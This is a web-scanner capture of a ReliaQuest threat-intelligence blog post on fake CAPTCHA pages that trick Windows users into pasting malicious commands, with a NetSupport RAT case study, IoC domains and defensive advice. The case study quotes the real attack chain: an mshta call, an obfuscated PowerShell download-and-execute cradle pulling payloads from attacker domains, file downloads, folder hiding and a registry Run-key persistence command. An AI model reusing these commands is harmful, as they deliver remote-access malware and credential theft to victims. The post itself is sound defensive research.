www.reliaquest.com
Open in
urlscan Pro
141.193.213.20
Public Scan
URL:
https://www.reliaquest.com/blog/using-captcha-for-compromise/
Submission: On January 10 via api from IN — Scanned from DK
Submission: On January 10 via api from IN — Scanned from DK
Form analysis 4 forms found in the DOM
GET https://www.reliaquest.com/
<form id="searchwp-form-1" role="search" method="get" class="searchwp-form" action="https://www.reliaquest.com/">
<input type="hidden" name="swp_form[form_id]" value="1">
<div class="swp-flex--col swp-flex--wrap swp-flex--gap-md">
<div class="swp-flex--row swp-items-stretch swp-flex--gap-md">
<div class="searchwp-form-input-container swp-items-stretch">
<input type="search" class="swp-input--search swp-input" placeholder="" value="" name="s" title="" data-swplive="true" autocomplete="off" aria-owns="searchwp_live_search_results_678137eadbe1d" aria-autocomplete="both"
aria-label="When autocomplete results are available use up and down arrows to review and enter to go to the desired page. Touch device users, explore by touch or with swipe gestures.">
</div>
</div>
</div>
</form>GET https://www.reliaquest.com
<form action="https://www.reliaquest.com" method="get" class="form-mobile">
<div class="form-group">
<div class="input-group d-flex position-relative">
<span class="input-group-text position-absolute"><i class="icon-search"></i></span>
<button class="btn btn-outline-secondary position-absolute" type="reset" id="button-addon1"><i class="icon-close"></i></button>
<input class="form-control" type="text" name="s" placeholder="Search here.." value="" aria-label="default input example">
</div>
</div>
<button type="submit" class="btn btn-primary w-100">Search</button>
</form><form id="mktoForm_3707" novalidate="novalidate" class="mktoForm mktoHasWidth mktoLayoutLeft" style="font-family: Helvetica, Arial, sans-serif; font-size: 13px; color: rgb(51, 51, 51); width: 271px;">
<style type="text/css">
.mktoForm .mktoButtonWrap.mktoRound .mktoButton {
color: #fff;
border: 1px solid #a3bee2;
-webkit-border-radius: 5px;
-moz-border-radius: 5px;
border-radius: 5px;
background-color: #779dd5;
background-image: -webkit-gradient(linear, left top, left bottom, from(#779dd5), to(#5186cb));
background-image: -webkit-linear-gradient(top, #779dd5, #5186cb);
background-image: -moz-linear-gradient(top, #779dd5, #5186cb);
background-image: linear-gradient(to bottom, #779dd5, #5186cb);
padding: 0.4em 1em;
font-size: 1em;
}
.mktoForm .mktoButtonWrap.mktoRound .mktoButton:hover {
border: 1px solid #45638c;
}
.mktoForm .mktoButtonWrap.mktoRound .mktoButton:focus {
outline: none;
border: 1px solid #45638c;
}
.mktoForm .mktoButtonWrap.mktoRound .mktoButton:active {
background-color: #5186cb;
background-image: -webkit-gradient(linear, left top, left bottom, from(#5186cb), to(#779dd5));
background-image: -webkit-linear-gradient(top, #5186cb, #779dd5);
background-image: -moz-linear-gradient(top, #5186cb, #779dd5);
background-image: linear-gradient(to bottom, #5186cb, #779dd5);
}
</style>
<div class="mktoFormRow">
<div class="mktoFieldDescriptor mktoFormCol" style="margin-bottom: 10px;">
<div class="mktoOffset" style="width: 10px;"></div>
<div class="mktoFieldWrap mktoRequiredField"><label for="Email" id="LblEmail" class="mktoLabel mktoHasWidth" style="width: 100px;">
<div class="mktoAsterix">*</div>Email
</label>
<div class="mktoGutter mktoHasWidth" style="width: 10px;"></div><input id="Email" name="Email" maxlength="255" aria-labelledby="LblEmail InstructEmail" type="email" class="mktoField mktoEmailField mktoHasWidth mktoRequired"
aria-required="true" style="width: 150px;"><span id="InstructEmail" tabindex="-1" class="mktoInstruction"></span>
<div class="mktoClear"></div>
</div>
<div class="mktoClear"></div>
</div>
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow d-none">
<div class="mktoFieldDescriptor mktoFormCol" style="margin-bottom: 10px;">
<div class="mktoOffset" style="width: 10px;"></div>
<div class="mktoFieldWrap"><label for="subscribeMarketingCommunications" id="LblsubscribeMarketingCommunications" class="mktoLabel mktoHasWidth" style="width: 0px;">
<div class="mktoAsterix">*</div>
</label>
<div class="mktoGutter mktoHasWidth" style="width: 10px;"></div>
<div class="mktoLogicalField mktoCheckboxList mktoHasWidth" style="width: 150px;"><input name="subscribeMarketingCommunications" id="mktoCheckbox_37600_0" type="checkbox" value="yes"
aria-labelledby="LblsubscribeMarketingCommunications LblmktoCheckbox_37600_0 InstructsubscribeMarketingCommunications" class="mktoField"><label for="mktoCheckbox_37600_0" id="LblmktoCheckbox_37600_0"><strong>Subscribe to Marketing
Communications</strong><br><br>Stay up to date with the latest cybersecurity trends with our Monthly Newsletter, Webinars hosted by Industry Thought Leaders, and more.</label></div><span id="InstructsubscribeMarketingCommunications"
tabindex="-1" class="mktoInstruction"></span>
<div class="mktoClear"></div>
</div>
<div class="mktoClear"></div>
</div>
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow d-none">
<div class="mktoFieldDescriptor mktoFormCol" style="margin-bottom: 10px;">
<div class="mktoOffset" style="width: 10px;"></div>
<div class="mktoFieldWrap"><label for="subscribeWeeklyIntelligenceSummary" id="LblsubscribeWeeklyIntelligenceSummary" class="mktoLabel mktoHasWidth" style="width: 0px;">
<div class="mktoAsterix">*</div><strong> </strong>
</label>
<div class="mktoGutter mktoHasWidth" style="width: 10px;"></div>
<div class="mktoLogicalField mktoCheckboxList mktoHasWidth" style="width: 150px;"><input name="subscribeWeeklyIntelligenceSummary" id="mktoCheckbox_37601_0" type="checkbox" value="yes"
aria-labelledby="LblsubscribeWeeklyIntelligenceSummary LblmktoCheckbox_37601_0 InstructsubscribeWeeklyIntelligenceSummary" class="mktoField"><label for="mktoCheckbox_37601_0" id="LblmktoCheckbox_37601_0"><strong>Subscribe to Intelligence
Summary:</strong><br><br> See the latest threats and techniques the ReliaQuest Threat Research Team is tracking, as well as relevant content across the threat landscape</label></div><span id="InstructsubscribeWeeklyIntelligenceSummary"
tabindex="-1" class="mktoInstruction"></span>
<div class="mktoClear"></div>
</div>
<div class="mktoClear"></div>
</div>
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow d-none">
<div class="mktoFieldDescriptor mktoFormCol" style="margin-bottom: 10px;">
<div class="mktoOffset" style="width: 10px;"></div>
<div class="mktoFieldWrap"><label for="subscribetoAllCommunications" id="LblsubscribetoAllCommunications" class="mktoLabel mktoHasWidth" style="width: 0px;">
<div class="mktoAsterix">*</div>
</label>
<div class="mktoGutter mktoHasWidth" style="width: 10px;"></div>
<div class="mktoLogicalField mktoCheckboxList mktoHasWidth" style="width: 150px;"><input name="subscribetoAllCommunications" id="mktoCheckbox_37599_0" type="checkbox" value="Yes"
aria-labelledby="LblsubscribetoAllCommunications LblmktoCheckbox_37599_0 InstructsubscribetoAllCommunications" class="mktoField"><label for="mktoCheckbox_37599_0" id="LblmktoCheckbox_37599_0"><strong>Subscribe to All
Communications</strong></label></div><span id="InstructsubscribetoAllCommunications" tabindex="-1" class="mktoInstruction"></span>
<div class="mktoClear"></div>
</div>
<div class="mktoClear"></div>
</div>
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow d-none">
<div class="mktoFormCol" style="margin-bottom: 10px;">
<div class="mktoOffset mktoHasWidth" style="width: 10px;"></div>
<div class="mktoFieldWrap">
<div class="mktoHtmlText mktoHasWidth" style="width: 260px;">
<div> </div>
</div>
<div class="mktoClear"></div>
</div>
<div class="mktoClear"></div>
</div>
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow">
<div class="mktoFormCol" style="margin-bottom: 10px;">
<div class="mktoOffset mktoHasWidth" style="width: 10px;"></div>
<div class="mktoFieldWrap">
<div class="mktoHtmlText mktoHasWidth" style="width: 230px;">By submitting this form, you agree to the ReliaQuest Website Terms of Use and <a href="https://www.reliaquest.com/privacy-policy/" target="_blank" id="">Privacy Policy</a></div>
<div class="mktoClear"></div>
</div>
<div class="mktoClear"></div>
</div>
<div class="mktoClear"></div>
</div>
<div class="mktoButtonRow"><span class="mktoButtonWrap mktoRound" style="margin-left: 120px;"><button type="submit" class="mktoButton btn btn-primary w-100">Sign Up</button></span></div><input type="hidden" name="formid"
class="mktoField mktoFieldDescriptor" value="3707"><input type="hidden" name="munchkinId" class="mktoField mktoFieldDescriptor" value="438-KYK-786">
</form><form novalidate="novalidate" class="mktoForm mktoHasWidth mktoLayoutLeft" style="font-family: Helvetica, Arial, sans-serif; font-size: 13px; color: rgb(51, 51, 51); visibility: hidden; position: absolute; top: -500px; left: -1000px; width: 1600px;">
</form>Text Content
Skip to Content
Javascript must be enabled for the correct page display
ReliaQuest to Bring Cyber Lab Bootcamp to ReliaQuest Bowl Universities
Learn More
* Unify Security Operations
Go Back
Unify Security operations
Reduce Alert Noise and False Positives
Automate Security Operations
Dark Web Monitoring
Maximize Existing Security Investments
Beyond MDR
Secure Multi-Cloud Environments
Secure Mergers and Acquisitions
Secure Operational Technology
Eliminate Mundane SecOps Tasks
Unify Your Security Operations
Whether you’re starting your security journey, need to up your game, or
you’re not happy with an existing service, we can help you to achieve your
security goals.
Explore Our Solutions
* Why ReliaQuest
Go Back
The ReliaQuest GreyMatter Platform
Detection Investigation Response
Threat Hunting
Threat Intelligence
Model Index
Automated Response Playbooks
Breach and Attack Simulation
Digital Risk Protection
Phishing Analyzer
Technology Partners
AI Agent for SecOps
Why ReliaQuest?
Whether you’re starting your security journey, need to up your game, or
you’re not happy with an existing service, we can help you to achieve your
security goals.
Explore the GreyMatter Platform
* Learn
Go Back
Learn
Blog
Threat Research
Case Studies
Data Sheets
eBooks
Industry Guides
Research Reports
ShadowTalk Podcast
Solution Briefs
White Papers
Videos
Events & Webinars
ReliaQuest Resource Center
From prevention techniques to emerging security trends, our comprehensive
library can arm you with the tools you need to improve your security posture.
Resource Center
* Company
Go Back
Company
About ReliaQuest
Leadership
No Show Dogs Podcast
Make It Possible in the Community
Careers
Press and Media Coverage
Become a Technology Partner
Contact Us
A Mindset Like No Other in the Industry
Many companies tout their cultures; at ReliaQuest, we share a mindset. We
focus on four values every day to make security possible: being accountable,
helpful, adaptable, and focused. These values drive development of our
platform, relationships with our customers and partners, and further the
ReliaQuest promise of security confidence across our customers and our own
teams.
* Search
Go Back
Search
Request a Demo
Back to blog
USING CAPTCHA FOR COMPROMISE: HACKERS FLIP THE SCRIPT
Alex Capraro 17 December 2024
* Threat Intelligence
* Threat Research
TABLE OF CONTENTS
1. CAPTCHA Trickery: How Do Incidents Usually Play Out?
2. Shifting Threat Landscape in CAPTCHA Exploitation
3. What ReliaQuest is Doing
4. Fortifying Your Security Posture
5. Conclusion
6. IoCs
Key Points
* In our investigations, we identified malware campaigns using fake CAPTCHA
pages that mimic trusted services like Google and CloudFlare.
* These malicious CAPTCHAs silently copy commands to users’ clipboards,
tricking them into execution via the Windows Run prompt.
* Infections typically involve information stealers (infostealers) and
remote-access trojans (RATs) that extract sensitive data and facilitate
persistent access to compromised systems.
* An increasing number of cybercriminals, including advanced threat actors like
“APT28” (aka Fancy Bear), are successfully employing these deceptive tactics.
This rapid proliferation underscores the need for timely and adaptive
defensive measures.
* Organizations should educate employees to recognize the risks of fake
CAPTCHAs and implement detection measures to block associated indicators of
compromise (IoCs).
Cyber adversaries are constantly inventing new ways to outsmart defenses and
exploit unsuspecting users. In early September 2024, ReliaQuest identified
multiple incidents in customer environments involving compromised websites
impersonating CAPTCHA pages—those familiar online verification tools that ask
you to prove you’re human—to spread malware. These attacks impersonate trusted
CAPTCHA services like Google and CloudFlare, luring users into a false sense of
security.
From October to early December 2024, our customers observed nearly twice as many
fake CAPTCHA websites compared to September. This surge was likely the result of
researchers releasing the templates used for these campaigns, which
inadvertently provided more threat actors with the tools to easily replicate
these tactics.
These incidents often culminate in credential theft, giving attackers a crucial
foothold for launching data breaches, hijacking accounts, or committing
financial fraud. By exploiting users’ trust in CAPTCHA systems, this effective
and deceptive tactic entices individuals into unknowingly bypassing standard
security measures designed to prevent malicious file downloads.
In this report, we take you through the progression of a typical incident
involving a fake CAPTCHA and detail the information-stealing malware
(infostealers) and remote-access trojans (RATs) these campaigns distribute. To
help you strengthen your defensive measures and reduce the impact of similar
attacks, we also examine a real-world case study, how the fake CAPTCHA method
might evolve, and how ReliaQuest’s automated response tools minimize its
consequences.
CAPTCHA TRICKERY: HOW DO INCIDENTS USUALLY PLAY OUT?
The attack chain is deceptively simple. It uses familiar CAPTCHA interfaces to
execute scripts, which makes it highly effective because of its seemingly benign
nature. The incidents we investigated typically followed the sequence below:
1. Malicious Redirect: A web user visits a compromised website and is redirected
to another webpage, where they’re presented with a familiar and seemingly
harmless CAPTCHA challenge (see Figure 1).
2. JavaScript Clipboard Hijack: Simply by visiting the website, a malicious
command is silently copied to the user’s clipboard via JavaScript, without their
knowledge.
3. Unusual Run Prompt: Instead of clicking how many traffic lights or bridges
they see, the user is instructed to open a Run prompt—a Windows feature for
quickly executing commands, opening programs, and accessing files—and paste the
pre-copied command, unknowingly running the malicious script.
4. Malware Installation: The command leads to the installation of malware, often
resulting in credential theft, as login details for systems, applications, and
services are harvested and sent to attackers.
Figure 1: Example of a fake CAPTCHA with the payload in the Run box
IMPERSONATING CLOUDFLARE: A STEP-BY-STEP LOOK AT THE ATTACK
The approach taken by the threat actor in this case study is particularly
innovative. The actor leveraged a malicious website that impersonated
CloudFlare, a widely used distributed denial of service (DDoS) protection
platform, to enhance the attack’s credibility.
Initial Infection
In October 2024, a retail trade customer encountered a fake CAPTCHA (see Figure
2) hosted at inspyrehomedesign[.]com after being redirected from
retailtouchpoints[.]com.
Figure 2: Fake Cloudflare CAPTCHA with the alerting command highlighted
Typical of deceptive CAPTCHAs, it instructed the user to perform a
copy-and-paste action in the Windows Run feature. Completing this fake CAPTCHA
resulted in the execution of the following command:
"C:\WINDOWS\system32\mshta.exe" https://inspyrehomedesign.com/Ray-verify.html #
''Verify you are human - Ray Verification ID: 6450''
In this command, the “Verify you are human” text comes after the malicious
command, cleverly concealing the harmful instructions once pasted into the
Windows Run box (see Figure 2).
The command uses the MSHTA.exe binary to download the file “Ray-verify[.]html.”
Notably, the use of the MSHTA.exe Windows utility allows for the discreet
download of the next stage of the infection. The HTML document contains
PowerShell commands that execute the subsequent payload(s).
Secondary Script Execution
The second stage of the attack began with the execution of a PowerShell script,
which concealed an additional PowerShell script within a file named “o.png.”
This obfuscation was designed to evade detection. The script was downloaded from
the domain “traversecityspringbreak[.]com” using the command:
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
$c1='(New-ObjectNet.We';$c4='bClient).Downlo';
$c3='adString(''http://traversecityspringbreak.com/o/o.png'')'; $TC=I`E`X
($c1,$c4,$c3 -Join '')|I`E`X
This subsequent command embedded within the “o.png” script then cleared the DNS
cache via the command below, likely to hide any evidence of the actor’s
malicious activity.
ipconfig /flushdns
To create a concealed directory, a random directory name was generated and
created in the user’s AppData folder using the command:
$randomFolderName = -join ((65..90) + (97..122) | Get-Random -Count 6 | %
{[char]$_}) New-Item -ItemType Directory -Path $randomFolderPath
This led to the following path being created:
C:\Users\CURRENTUSER\AppData\Roaming\geWGID
Downloading and Hiding Malicious Components
Next, 12 more files were downloaded from traversecityspringbreak[.]com using the
command:
Invoke-WebRequest http://traversecityspringbreak.com/o/[n].png -OutFile
C:\Users\CURRENTUSER\AppData\Roaming\geWGID\[filename]
The files included “client32.ini” (a configuration file) and “client32.exe” (the
main file for NetSupport RAT). The threat actor hid the directory to conceal the
installation of these 12 files from the user via the command:
cmd /c attrib +h C:\Users\CURRENTUSER\AppData\Roaming\geWGID
Establishing Persistence and Running the RAT
A “Run Key” was added to the registry using the following command to ensure the
RAT is executed at every startup:
New-ItemProperty -Path HKCU:SOFTWARE\Microsoft\Windows\CurrentVersion\Run -Name
Microsoft -Value C:\Users\CURRENTUSER\AppData\Roaming\geWGID\client32.exe
Finally, the adversary launched the RAT using the command:
Start-Process C:\CURRENTUSER\admin\AppData\Roaming\geWGID\client32.exe
How did ReliaQuest Respond?
A ReliaQuest GreyMatter alert fired because of suspicious PowerShell execution
in the initial command line of this attack.
Our investigation into the suspicious activity revealed that the indicators of
compromise (IoCs), including client32.exe and client32.ini, were consistent with
the installation of NetSupport RAT—a malicious remote-access tool known for
targeting various sectors to facilitate data theft, espionage, and network
control.
ReliaQuest isolated the affected host using GreyMatter Response Playbooks,
revoked the user’s session, reset their password, and blocked the identified
IoCs using GreyMatter Respond.
The key takeaway from this case study is the urgent need to educate employees
about new and evolving manipulation techniques. This knowledge will empower them
to recognize suspicious activities, such as websites that prompt users to run
commands. Additionally, companies should implement network controls to block
access to newly registered and compromised websites, further fortifying defenses
against such threats.
To prevent similar incidents, targeted user training is crucial. Focus on
helping your teams recognize the signs of malicious activity, such as unexpected
requests to run commands or download (potentially malicious) updates from
unverified sources. Encourage them to be vigilant in verifying URL authenticity
to thwart infection attempts. Training should also cover identifying unusual
behavior in familiar interfaces, like CAPTCHAs asking for non-standard actions.
By providing clear examples, employees will be able to effectively spot these
threats early. Additionally, emphasize the importance of immediately reporting
suspicious activities to enable rapid responses and mitigation actions, such as
blocking malicious domains.
Active since at least 2017, “NetSupport RAT” uses the NetSupport Manager tool,
which is known for surveillance capabilities like keystroke logging, screen
capturing, and webcam access. NetSupport RAT spreads primarily through phishing,
drive-by downloads, and exploiting vulnerabilities like CVE-2023-36025—a Windows
SmartScreen bypass vulnerability. A NetSupport RAT infection can lead to
catastrophic breaches, giving attackers control over your system, enabling
extensive data theft, unauthorized surveillance, and potentially facilitating
lateral movement and disruption in your network.
SHIFTING THREAT LANDSCAPE IN CAPTCHA EXPLOITATION
INNOVATIVE STRATEGIES IN USER MANIPULATION
This is not the first time we’ve seen threat actors using individuals’
clipboards to trick them into executing malicious commands. In May 2024, we
found that the JavaScript framework “ClearFake” had been using a similar
campaign to drop infostealers.
Instead of a CAPTCHA, compromised websites displayed a prompt indicating content
could not be shown properly (see Figure 3) and instructed users to install a
root certificate by clicking a “Fix it” button.
Figure 3: Example of a “ClickFix/ClearFake” campaign pop-up message
This action copied obfuscated malicious PowerShell code to the users’
clipboards. Users were then guided to open a PowerShell terminal and paste in
the code, which was then executed.
The ClearFake campaign is a less polished precursor to the new fake CAPTCHA
tactics.
The root certificate approach relies heavily on user compliance, requiring steps
like manually copying commands to the user’s clipboard and opening a PowerShell
terminal—actions likely to raise suspicion among more cautious users.
In contrast, the new fake CAPTCHA method simplifies the process by presenting a
familiar and trusted CAPTCHA interface with fewer steps to follow, which reduces
user hesitation.
This effective, streamlined method has, in turn, led to various modifications
and improvements, including:
* New Fake CAPTCHA Templates: Innovative templates mimicking CloudFlare and
Google Meet pages have been created. By continually developing new landing
pages to deliver the fake CAPTCHAs, attackers can target a broader range of
potential victims.
* Bypassing User Verification: The method now skips the “verify” click step to
access instructions, encouraging users to complete the copy-paste
instructions more mindlessly, reducing their chance to scrutinize the
actions.
* Clipboard Clearing: After executing the payload command, the clipboard is
cleared to hide the malicious activity, making detection more difficult.
The clear evolution of user manipulation tactics highlights how quickly threat
actors can make improvements to existing campaigns for greater impact. These
advancements demonstrate not only the adaptability of cybercriminals but also
the growing sophistication of their methods. As threat actors refine their
techniques, they can exploit user trust more effectively, bypass security
measures with greater ease, and widen their reach to target more individuals.
CAPTCHA ME IF YOU CAN: TOP THREATS
We looked into customer incidents involving the new fake CAPTCHA campaign to
find the most prevalent malware families found in these infections between
October and early December 2024:
1. “Lumma Stealer” (aka LummaC2, Lumma)
2. “StealC”
3. NetSupport RAT (aka Netsupport)
4. Amadey”
Figure 4: BreachForums user recommending Lumma Stealer
RATs like NetSupport grant attackers persistent access to compromised systems,
enabling continuous surveillance, data theft, and lateral movement within
networks. This means attackers can monitor activities, intercept sensitive
communications, and potentially access other connected systems, amplifying the
impact of a breach.
Infostealers from campaigns like Lumma and StealC can exfiltrate sensitive data,
including login credentials, financial information, and personally identifiable
information (PII). This stolen data is often sold on underground markets,
leading to identity theft, financial fraud, and initial acess into enterprise
networks. The financial and reputational damage from such compromises can be
significant, affecting customer trust and resulting in regulatory penalties.
Threat actors on cybercriminal forums frequently seek recommendations for the
most effective tools. The widespread adoption of Lumma Stealer is likely
influenced by endorsements from high-reputation forum users who have found the
tool effective and advocate its use to others. As shown in the screenshot (see
Figure 4), a prominent BreachForums user specifically recommends Lumma Stealer
to another forum user.
HIGH-LEVEL HACKERS TURN TO BASIC CAPTCHA TACTICS
Both regular cybercriminals and sophisticated groups like APT28, linked to the
Russian military, are trying their hand at these tactics. A recent investigation
by the Computer Emergency Response Team of Ukraine (CERT-UA) revealed APT28 had
been using fake CAPTCHA systems to infiltrate local governments. By mimicking
reCAPTCHA interfaces, they tricked users into executing commands that downloaded
harmful scripts. These scripts are capable of establishing Secure Shell (SSH)
tunnels and exfiltrating data, highlighting the attack’s simplicity and potency.
This is significant because, traditionally, effective hacking methods are first
developed by skilled groups and eventually trickle down to less experienced
hackers. However, in this case, even advanced groups are adopting tactics
typically used by common cybercriminals, underscoring the surprising
effectiveness of these fake CAPTCHA strategies.
WHAT RELIAQUEST IS DOING
ReliaQuest is actively monitoring these evolving campaigns, with a keen focus on
shifts in delivery mechanisms. Although fake CAPTCHAs are a new technique, the
underlying method relies on encoded PowerShell commands or Living off the Land
binaries (LOLBins) like MSHTA.exe. As such, we can detect this activity using
pre-established detection rules to identify common malware delivery techniques.
GREYMATTER RESPOND AND AUTOMATED RESPONSE PLAYBOOKS
For the fastest remediation against threats like NetSupport RAT, organizations
should implement automated response actions. Enabling GreyMatter’s Automated
Response Playbooks allows for automatic threat containment, reducing the mean
time to contain a threat, or MTTC, and halting the adversary’s progress.
Alternatively, organizations can opt for the “RQ Approved” setting to allow our
analyst team to handle remediation actions. This approach speeds up containment
while requiring a ReliaQuest analyst’s discretion when executing a Response
Playbook.
To most effectively contain and mitigate threats from NetSupport RAT, enabling
and automating the Isolate Host response playbook is crucial—after ensuring that
legitimate user activities and critical business processes won’t be disrupted.
This action severs all connections to the attacker’s command-and-control (C2)
infrastructure, preventing further execution of malicious commands or downloads.
If isolating the host isn’t feasible, for instance when dealing with critical
business assets, we recommend manually executing the Block IP, Block Domain, and
Block URL playbooks on identified attacker infrastructure. These actions prevent
hosts from downloading additional malware and stop them from reconnecting to the
C2 infrastructure.
Given that most malware, including infostealers, targets sensitive information,
it’s always best to err on the side of caution and assume that a user’s
credentials may be compromised. Activating the Terminate Active Sessions and
Reset Password playbooks ensures that any hijacked sessions are ended and
compromised credentials are changed, thereby preventing further unauthorized
access.
Additionally, running the Delete File and Block Hash playbooks removes
identified malicious files and blocks their execution on other hosts. This
limits the threat actor’s ability to move laterally and prevents additional
compromises.
Organizations using ReliaQuest’s Automated Response Playbooks have reduced their
MTTC to an average of just five minutes for relevant alerts, compared to five
hours or longer when relying on manual response strategies. These playbooks are
proven to effectively mitigate threats and minimize operational disruptions,
allowing organizations to contain threats quickly and maintain operational
continuity.
FORTIFY YOUR SECURITY POSTURE BY:
* Conducting Employee Training and Awareness: Conduct regular training sessions
to educate employees about the risks associated with fake CAPTCHAs. Though
this may sound generic, an informed workforce is a critical defense against
social engineering attacks. Training should cover how to spot suspicious
CAPTCHAs, such as recognizing when websites are instructing users to run
commands.
* Disabling Password Saving in Browsers: Implement strict network policies or
Group Policy Objects (GPOs) to prevent web browsers from saving passwords.
This critical security measure helps protect against infostealers that target
stored credentials to exfiltrate sensitive information. Conduct regular
audits to ensure compliance and effectiveness. Alternatively, consider
deploying an organization-wide password manager, offering users convenience
while enhancing security.
* Deploying Constrained Language Mode: This mode restricts PowerShell’s
scripting environment to a safer subset of its functionality, limiting access
to potentially dangerous operations. It prevents the use of certain language
elements and object types that attackers could exploit. By doing so,
Constrained Language Mode reduces the attack surface, making it harder for
malicious scripts to execute harmful actions, evade detection, or escalate
privileges.
CONCLUSION
In this report, we’ve highlighted the urgent need for robust cybersecurity
measures in the face of evolving CAPTCHA techniques used by both everyday
cybercriminals and advanced groups like APT28. Automated incident response
measures not only accelerate remediation efforts but also allow for analyst
oversight when needed. By implementing GreyMatter Automated Response Playbooks,
organizations can swiftly and effectively contain these threats, significantly
reducing MTTC and ensuring operational continuity.
Looking ahead, we predict with high confidence that threat actors will continue
to innovate and refine their CAPTCHA-targeting campaigns, making them even more
elusive. Within the next three months, we anticipate enhancements in the fake
CAPTCHA infection vector, such as employing alternative execution methods that
do not use PowerShell commands. This could involve using other LOLBins like
forfiles.exe or certutil.exe to download the initial stage, aiming to circumvent
existing detection measures.
This evolution presents a significant risk and highlights the importance of a
defense-in-depth strategy that layers multiple security measures to effectively
counter these advancing threats. By adopting this approach, you can harden your
defenses, mitigate similar threats, and maintain a resilient security posture.
IOCS
We have incorporated these IoCs into our GreyMatter Intel feed for ReliaQuest
customers. Our investigations found that these domains hosted fake CAPTCHA
infrastructure in various incidents.
* holidaybunch[.]com
* forthedoglover[.]com
* traversecityspringbreak[.]com
* inspyrehomedesign[.]com
* retailtouchpoints[.]com
* webdemo[.]biz
* thecopycat[.]biz
STAY AHEAD OF THREATS WITH RAPID AND COMPREHENSIVE THREAT DETECTIONS
As adversaries evolve their attack techniques, maintaining an effective threat
detection strategy is crucial. Explore our Detection Design Guide for insights
on leveraging detection orchestration to meet your organization's needs.
Get the Ebook
TABLE OF CONTENTS
1. CAPTCHA Trickery: How Do Incidents Usually Play Out?
2. Shifting Threat Landscape in CAPTCHA Exploitation
3. What ReliaQuest is Doing
4. Fortifying Your Security Posture
5. Conclusion
6. IoCs
Alex Capraro
Cyber Threat Intelligence Analyst
Explore Blogs
TABLE OF CONTENTS
1. CAPTCHA Trickery: How Do Incidents Usually Play Out?
2. Shifting Threat Landscape in CAPTCHA Exploitation
3. What ReliaQuest is Doing
4. Fortifying Your Security Posture
5. Conclusion
6. IoCs
Alex Capraro
Cyber Threat Intelligence Analyst
Explore Blogs
Resources
RELATED BLOGS
Threat Intelligence | Threat Research
REPORT REVEALS SPEARPHISHING CONSTITUTES 81% OF UTILITIES SECTOR ALERTS
1 Mins
Learn More
Dark Web Research | Mergers and Acquisitions | Threat Research
THE CYBERSECURITY CHALLENGE IN MERGERS AND ACQUISITIONS
1 Mins
Learn More
Threat Intelligence | Threat Research
TOP CYBER ATTACKER TECHNIQUES, AUGUST–OCTOBER 2024
21 Mins
Learn More
All Blogs
SEE GREYMATTER IN ACTION
Get a live demo of our security operations platform, GreyMatter, and learn how
you can improve visibility, reduce complexity, and manage risk in your
organization.
Request a Demo
Contact ReliaQuest Sales (800) 925-2159 Global Corporate Headquarters
1001 Water St
Suite 1900
Tampa, FL 33602 Stay Ahead of Threats
Subscribe now to get updates on the latest emerging threats and industry trends
in SecOps.
*
Email
*
Subscribe to Marketing Communications
Stay up to date with the latest cybersecurity trends with our Monthly
Newsletter, Webinars hosted by Industry Thought Leaders, and more.
*
Subscribe to Intelligence Summary:
See the latest threats and techniques the ReliaQuest Threat Research Team is
tracking, as well as relevant content across the threat landscape
*
Subscribe to All Communications
By submitting this form, you agree to the ReliaQuest Website Terms of Use and
Privacy Policy
Sign Up
*
*
*
*
*
Unify Security Operations
* Solution Overview
* Reduce Noise and False Positives
* Automate Security Operations
* Dark Web Monitoring
* Maximize Security Investments
* Beyond MDR
* Secure Multi-Cloud Environments
* Secure Mergers and Acquisitions
* Operational Technology
Why ReliaQuest
* Explore the GreyMatter Platform
* Detection Investigation Response
* Threat Hunting
* Threat Intelligence
* Model Index
* Automated Response Playbooks
* Breach and Attack Simulation
* Digital Risk Protection
* Phishing Analyzer
* Technology Partners
Learn
* Resource Center
* Blog
* Threat Research
* Case Studies
* Data Sheets
* eBooks
* Industry Guides
* Research Reports
* ShadowTalk Podcast
* Solution Briefs
* White Papers
* Videos
* Events & Webinars
Company
* About ReliaQuest
* Leadership
* No Show Dogs Podcast
* Make It Possible in the Community
* Careers
* Press and Media Coverage
* Become a Technology Partner
* Contact Us
* Report a Vulnerability
* Privacy Policy
* ReliaQuest Platform and Support Agreement
* © 2024 ReliaQuest, LLC All Rights Reserved
✓
Tak fordi du delte!
AddToAny
Mere…
word word word word word word word word word word word word word word word word
word word word word word word word word word word word word word word word word
word word word word word word word word word word word word word word word word
word word word word word word word word word word word word word word word word
word word word word word word word word word word word word word word word word
word word word word word word word word word word word word word word word word
word word word word word word word word word word word word word word word word
word word word word word word word word word word word word word word word word
word word word word word word word word word word word word word word word word
word word word word word word word word word word word word word word word word
word word word word word word word word word word word word word word word word
word word word word word word word word word word word word word word word word
word word word word word word word word
mmMwWLliI0fiflO&1
mmMwWLliI0fiflO&1
mmMwWLliI0fiflO&1
mmMwWLliI0fiflO&1
mmMwWLliI0fiflO&1
mmMwWLliI0fiflO&1
mmMwWLliI0fiflO&1